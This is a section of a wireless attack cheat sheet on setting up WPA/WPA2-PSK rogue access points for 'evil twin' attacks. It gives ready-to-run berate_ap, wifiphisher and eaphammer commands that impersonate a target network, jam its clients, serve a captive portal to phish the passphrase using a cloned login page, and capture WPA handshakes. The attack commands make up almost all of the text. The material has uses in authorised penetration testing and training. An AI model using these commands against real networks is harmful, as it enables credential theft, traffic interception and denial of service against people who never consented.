12. WPA WPA2 Personal (PSK) Rogue AP Evil Twin

• Performing Evil Twin Attack with an AP set up with WPA/WPA2 will require the knowledge of the passphrase of the target network (e.g. in conference, passphrase already cracked...).
• If passphrase is unknown, an Evil Twin attack using an Open Network rogue AP can be set up (for example to attempt retrieving passphrase by phishing via captive portal attack).

Basic WPA/WPA2-PSK AP

• With Internet sharing (default):

berate_ap <interface_AP> <interface_internet> <SSID> <passphrase>

• Without internet sharing

berate_ap -n <interface_AP> <SSID> <passphrase>

• Bridged internet sharing (pre-configured bridge interface)

berate_ap -m bridge <interface_AP> <interface_internet> <SSID> <passphrase>

• Internet sharing from the same WiFi interface

berate_ap <interface_AP> <interface_AP> <SSID> <passphrase>

• Enable IEEE 802.11n (with 40MHz)

berate_ap --ieee80211n --ht_capab '[HT40+]' <interface_AP> <interface_internet> <SSID> <passphrase>

• Enable client isolation

berate_ap --isolate-clients <interface_AP> <interface_internet> <SSID> <passphrase>

WPA/WPA2-PSK AP Evil Twin + Captive Portal Attack

With wifiphisher:

wifiphisher -aI <interface_rogue_AP> -jI <interface_jamming> --essid <target_SSID> -pK <passphrase> -kN

With eaphammer:

./eaphammer -i wlan0 --channel <channel_number> --auth wpa-psk \
--essid <SSID> --wpa-passphrase <passphrase> --captive-portal  # WPA2 by default

./eaphammer -i wlan0 --channel <channel_number> --auth wpa-psk \
--essid <SSID> --wpa-passphrase <passphrase> --captive-portal --wpa-version 1  # Force WPA1

For best results on phishing:

• Clone legitimate page (wget),
• Copy cloned web page in /var/www/html/ directory(eaphammer serves webpage from here according to default Apache2 configuration).

WPA/WPA2-PSK AP Evil Twin + (Half) WPA Handhshake Capture

./eaphammer -i wlan0 --channel <channel_number> --auth wpa-psk \
--essid <SSID> --wpa-passphrase randompassphrase --capture-wpa-handhshake